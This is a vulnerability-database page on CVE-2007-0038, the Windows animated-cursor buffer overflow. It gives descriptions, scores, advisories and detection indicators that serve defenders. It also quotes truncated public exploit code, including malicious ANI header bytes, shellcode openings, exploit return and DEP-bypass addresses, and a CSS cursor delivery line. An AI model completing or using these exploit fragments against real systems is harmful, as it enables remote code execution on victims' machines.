CVE-2007-0038
published 2007-03-30CVE-2007-0038: Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause…
PriorityP273critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
72.88%
99.4th percentile
Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765; if so, then CVE-2007-0038 should be preferred.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | ie | — | — |
| microsoft | internet_explorer | <= 6 | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
52 49 46 46 08 4D 00 00 41 43 4F 4E 61 6E 69 68
bytes↗
52 49 46 46 00 04 00 00 41 43 4F 4E 61 6E 69 68
bytes↗
52 49 46 46 13 03 00 00 41 43 4F 4E 61 6E 69 68
- →Exploit delivery via HTML page using CSS cursor property pointing to a remote .ANI file; detect HTTP responses serving .ANI files with Content-Type application/octetstream alongside HTML pages referencing cursor URLs. ↗
- →Exploit HTML embeds malicious ANI via CSS: '* {CURSOR: url("poc.ani")}' — monitor for HTML pages with wildcard CSS cursor rules pointing to .ani files. ↗
- →Return address 0x7c801aed (JMP ESP in ntdll.dll) used at buffer offset 168 in crafted ANI file for Windows XP SP2; look for this 4-byte sequence at offset 168 in ANI files: ED 1E 94 7C. ↗
- →Return address 0x7c801a7b (CALL ESI in kernel32.dll) used at buffer offset 168 in crafted ANI file for Windows XP SP2; look for byte sequence 7B 1A 80 7C at offset 168 in ANI files. ↗
- →Exploit targets Windows XP SP2 DEP bypass using ret2libc: kernel32.dll gadget at 0x7C8024D6 and msvcrt.dll system() at 0x77C293C7; detect these addresses in ANI file payloads. ↗
- →Shellcode uses windows/shell_reverse_tcp connecting back to attacker; monitor for outbound TCP connections from browser/explorer processes shortly after ANI file processing. ↗
- →ANI files with 'anih' chunk size field set to 0xFFFF (\xff\xff\x00\x00) are malformed and indicative of exploit attempts; validate anih chunk size in ANI file parsers. ↗
- ·The exploit targets multiple Windows versions and DLL base addresses; ROP/return addresses are ASLR-sensitive and vary by OS language/SP version. Hardcoded addresses in exploits are only valid for specific DLL versions listed. ↗
- ·CVE-2007-1765 may be a duplicate of CVE-2007-0038; treat both identifiers as referring to the same ANI stack overflow vulnerability. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p2h6-rq92-jmvq: Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-0038 [HIGH] CWE-119 GHSA-p2h6-rq92-jmvq: Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code
Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765; if so, then CVE-2007-0038 should be preferred.
GHSA
GHSA-f56g-48jx-gg6q: Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-1765 [HIGH] GHSA-f56g-48jx-gg6q: Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (
Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038; if so, then use CVE-2007-0038 instead of this identifier.
VulnCheck
Microsoft Windows Cursor, Animated Cursor, and Icon Processing Vulnerability
vulncheck·2007·CVSS 7.5
CVE-2007-1765 [HIGH] Microsoft Windows Cursor, Animated Cursor, and Icon Processing Vulnerability
Microsoft Windows Cursor, Animated Cursor, and Icon Processing Vulnerability
Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038; if so, then use CVE-2007-0038 instead of this identifier.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://archive.f-
VulnCheck
Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2007·CVSS 7.5
CVE-2007-0038 [HIGH] Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765; if so, then CVE-2007-0038 should be preferred.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product i
No detection rules found.
Exploit-DB
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)
exploitdb·2010-09-20
CVE-2007-1765 Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)
---
##
# $Id: ms07_017_ani_loadimage_chunksize.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)',
'Description' => %q{
This module exploits a buffer overflow vulnerability in the
LoadAniIcon() function of USER32.dll. The flaw is triggered
through Outlook Express by using the CURSOR style sheet
directive to load a malicious .ANI file.
Th
Exploit-DB
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)
exploitdb·2010-08-12
CVE-2007-0038 Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)
---
##
# $Id: ms07_017_ani_loadimage_chunksize.rb 9984 2010-08-12 16:56:41Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)',
'Description' => %q{
This module exploits a buffer overflow vulnerability in the
LoadAniIcon() function in USER32.dll. The flaw can be triggered through
Internet Explorer 6 and 7 by using the CURSOR style sheet directive
to load a malicious .AN
Exploit-DB
Microsoft Windows - Animated Cursor Stack Overflow
exploitdb·2007-06-07
CVE-2007-0038 Microsoft Windows - Animated Cursor Stack Overflow
Microsoft Windows - Animated Cursor Stack Overflow
---
#!/usr/bin/env python
#
# $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $
#
# Windows Animated Cursor Stack Overflow Exploit
# Copyright 2007 Ramon de Carvalho Valle ,
# RISE Security
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General P
Exploit-DB
Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
exploitdb·2007-04-26
CVE-2007-1215 Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
---
MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip)
# milw0rm.com [2007-04-26]
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
exploitdb·2007-04-17
CVE-2007-1215 Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
---
/*
GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
Coded by Lionel d'Hauenens
http://www.labo-asso.com
Development:
Dev-C++ 4.9.9.2
Linked with /lib/libgdi32.a
References:
http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
http://research.eeye.com/html/alerts/zeroday/20061106.html
http://www.milw0rm.com/exploits/3688
http://ivanlef0u.free.fr/?p=41
March 16, 2007
*/
#include
#include
#include
typedef enum _SECTION_INFORMATION_CLASS
{
SectionBasicInformation,
SectionImageInformation
} SECTION_INFORMATION_CLASS;
typedef struct _SECTION_BASIC_INFORMATION {
ULONG Base;
ULONG Attributes;
LARGE_INTEGER Size;
} SECTION_BASIC_INFORMATION;
typedef struct _GDI_TABLE_ENTRY
{
PVOID pKernelInfo;
WOR
Exploit-DB
Microsoft Windows - Animated Cursor '.ani' Local Overflow
exploitdb·2007-04-09
CVE-2007-0038 Microsoft Windows - Animated Cursor '.ani' Local Overflow
Microsoft Windows - Animated Cursor '.ani' Local Overflow
---
/*
.ANI exploit tested on Windows XP SP2 - Portuguese
Shellcode port bind 13579
JMP ESP Addr - ntdll.dll
Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna.
Exploit coded listen sauna hits
Featuring Luiz Zanardo's gigs "Minoide - \x52\x49\x46\x46\x00\x04\x00\x41" @ www.myspace.com/fuzzyproject
Breno Silva Pinto
bsilva[at]Sekure.org
*/
#include
#include
#include
unsigned char aniheader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02
Exploit-DB
Microsoft Windows Explorer - '.ANI' File Denial of Service
exploitdb·2007-04-08
CVE-2007-0038 Microsoft Windows Explorer - '.ANI' File Denial of Service
Microsoft Windows Explorer - '.ANI' File Denial of Service
---
/****************************************************************************
* MS Windows Explorer Unspecified .ANI File DoS *
* *
* *
* Another .Ani bug that freezes Explorer if you open a folder that contains *
* a crafted file. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded by Marsu *
****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
unsigned char Ani_headers[] =
"\x52\x49\x46\x46\x08\x4d\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x72\x61\x74\x65\x18\x00\x00\x00"
"\x03\x00
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
exploitdb·2007-04-08
CVE-2007-1215 Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
---
#define _WIN32_WINNT 0x0500
#include
#include
#include
#pragma comment (lib, "user32.lib")
#pragma comment (lib, "gdi32.lib")
#pragma comment (lib, "shlwapi.lib")
#pragma comment (lib, "ntdll.lib")
/*
Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the
win32k's SSDT by 0x2.
before :
lkd> dps bf998300 L 2
bf998300 bf934921 win32k!NtGdiAbortDoc
bf998304 bf94648d win32k!NtGdiAbortPath
after :
lkd> dps bf998300 L 2
bf998300 00000002
bf998304 bf94648d win32k!NtGdiAbortPath
win32k.sys bDeleteBrush (called by DeleteObject)
mov esi, [edx] ;esi=pKernelInfo
cmp
Exploit-DB
Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP)
exploitdb·2007-04-03·CVSS 9.3
CVE-2007-1765 [CRITICAL] Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP)
Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP)
---
/*
* version 0.5
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2
* [CVE-2007-1765]
*
*
* Description:
* A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
* error within the "LoadAniIcon()" [user32.dll] function when rendering
* cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
* tricking a user into visiting a malicious web page or viewing an email
* message containing a specially crafted ANI file.
*
* Hotfix/
Exploit-DB
Microsoft Windows - Animated Cursor '.ani' Universal Generator
exploitdb·2007-04-03
CVE-2007-0038 Microsoft Windows - Animated Cursor '.ani' Universal Generator
Microsoft Windows - Animated Cursor '.ani' Universal Generator
---
#--------------------------------------------------------------------------------
# Info: .ANI (RIFF Cursors) 2007 universal exploit generator
# Tested on MS Internet Explorer 6.x-7.x, Windows XP SP2, Windows Vista
# Author: Yag Kohha
# 10x`n`Gr33tz 2:
# Jamikazu, Skylined (pretty good t-short on BH07 Europe - L00k like skylined, skylined, skylined)
# H.D. Moor and metasploit project
# Kumar Brothers (tnx for Vista patch live show at BH07 Europe),
# Alexander Sotirov (tnx for "Heap Feng Shui" live show at BH07 Europe), str0ke
# Microsoft for great coding and Amsterdam (BH07 Europe) party
#--------------------------------------------------------------------------------
https://gitlab.com/exploit-database/exploitdb-bin-spl
Exploit-DB
Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow
exploitdb·2007-04-02
CVE-2007-0038 Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow
Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow
---
/***************************************************************************
* MS Windows .ANI File Local Buffer Overflow *
* *
* *
* Credits go to Trirat Puttaraksa cause his PoC inspired this source. *
* devcode's exploit didnt work for me, so I made my own. *
* This exploit launches calc.exe on a lot of app (Word, Winamp, etc...). * *
* Turn off DEP to get it work on Explorer. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded by Marsu *
***************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x29\xc9\x83\xe9
Exploit-DB
Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)
exploitdb·2007-04-01
CVE-2007-1765 Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)
Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)
---
Microsoft ANI Buffer Overflow Exploit
Author: Trirat Puttaraksa
http://sf-freedom.blogspot.com
Tested on: Windows XP SP2 fully patched + IE 6 SP2
For educational purpose only
There are many confuses about this vulnerability. Someone said that this could
not be exploited in XP SP2 - that's wrong. I provide this exploit because I
wanna to tell these people that they are in danger.
This exploit will call calc.exe (shellcode fome metasploit win32_exec
CMD=calc.exe EXITFUNC=process).
P.S. I do not include the source code for generate the .ani file because of
its damage. However, if you reverse engineer .ani file, you will know how
could I produce this exploit in 10 minutes.
I will describe this vulnerability and how t
Exploit-DB
Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)
exploitdb·2007-04-01
CVE-2007-1765 Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)
Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)
---
..::[ jamikazu presents ]::..
Windows Animated Cursor Handling Exploit (0day) (Version3)
Works on fully patched Windows Vista
I think it is first real remote code execution exploit on vista =)
Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It also must to work on all nt based windows but not tested)
Update: It also bypass eeye security ani patch!
Author: jamikazu
Mail: [email protected]
Bug discovered by determina (http://www.determina.com)
Credit: milw0rm,metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
https://gitlab.com/exploi
Exploit-DB
Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow
exploitdb·2007-04-01
CVE-2007-1765 Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow
Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow
---
..::[ jamikazu presents ]::..
Windows Animated Cursor Handling Exploit (0day)
Works on fully patched Windows Vista
I think it is first real remote code execution exploit on vista =)
Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It also must to work on all nt based windows but not tested)
Author: jamikazu
Mail: [email protected]
Bug discovered by determina (http://www.determina.com)
Credit: milw0rm,metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3634.
Exploit-DB
Microsoft Windows - Animated Cursor '.ani' Local Stack Overflow
exploitdb·2007-03-31·CVSS 9.3
CVE-2007-1765 [CRITICAL] Microsoft Windows - Animated Cursor '.ani' Local Stack Overflow
Microsoft Windows - Animated Cursor '.ani' Local Stack Overflow
---
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
* A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
* error within the "LoadAniIcon()" [user32.dll] function when rendering
* cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
* tricking a user into visiting a malicious web page or viewing an email
* message containing a specially crafted ANI file.
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable s
Exploit-DB
CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service
exploitdb·2007-02-01
CVE-2007-0816 CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service
CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service
---
#!/usr/bin/ruby
#
# Computer Associates (CA) Brightstor Backup Remote Procedure Call Server DoS (catirpc.dll)
#
# Catirpc.exe - Provides the endpoint mapper and enables RPC services for BrightStor Backup products.
#
# (7c.350): Access violation - code c0000005 (!!! second chance !!!)
# eax=007ef924 ebx=2e009560 ecx=00325ad8 edx=007ef900 esi=00000000 edi=00324308
# eip=2e00eda8 esp=007ef8b8 ebp=2e00be00 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
# *** WARNING: Unable to verify checksum for C:\Program Files\CA\BrightStor ARCserve
# Backup\CATIRPC.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program
# Files\CA\BrightStor A
Metasploit
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
metasploit
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.
Metasploit
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
metasploit
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2007-03/0470.htmlhttp://secunia.com/advisories/24659http://securityreason.com/securityalert/2542http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asphttp://www.kb.cert.org/vuls/id/191609http://www.osvdb.org/33629http://www.securityfocus.com/archive/1/464269/100/0/threadedhttp://www.securityfocus.com/archive/1/464339/100/0/threadedhttp://www.securityfocus.com/archive/1/464340/100/0/threadedhttp://www.securityfocus.com/archive/1/464342/100/0/threadedhttp://www.securityfocus.com/archive/1/464459/100/100/threadedhttp://www.securityfocus.com/archive/1/464460/100/100/threadedhttp://www.securityfocus.com/archive/1/466186/100/200/threadedhttp://www.us-cert.gov/cas/techalerts/TA07-089A.htmlhttp://www.us-cert.gov/cas/techalerts/TA07-093A.htmlhttp://www.us-cert.gov/cas/techalerts/TA07-100A.htmlhttp://www.vupen.com/english/advisories/2007/1215https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-017https://exchange.xforce.ibmcloud.com/vulnerabilities/33301https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1854http://archives.neohapsis.com/archives/fulldisclosure/2007-03/0470.htmlhttp://secunia.com/advisories/24659http://securityreason.com/securityalert/2542http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asphttp://www.kb.cert.org/vuls/id/191609http://www.osvdb.org/33629http://www.securityfocus.com/archive/1/464269/100/0/threadedhttp://www.securityfocus.com/archive/1/464339/100/0/threadedhttp://www.securityfocus.com/archive/1/464340/100/0/threadedhttp://www.securityfocus.com/archive/1/464342/100/0/threadedhttp://www.securityfocus.com/archive/1/464459/100/100/threadedhttp://www.securityfocus.com/archive/1/464460/100/100/threadedhttp://www.securityfocus.com/archive/1/466186/100/200/threadedhttp://www.us-cert.gov/cas/techalerts/TA07-089A.htmlhttp://www.us-cert.gov/cas/techalerts/TA07-093A.htmlhttp://www.us-cert.gov/cas/techalerts/TA07-100A.htmlhttp://www.vupen.com/english/advisories/2007/1215https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-017https://exchange.xforce.ibmcloud.com/vulnerabilities/33301https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1854
2007-03-30
Published
Exploited in the wild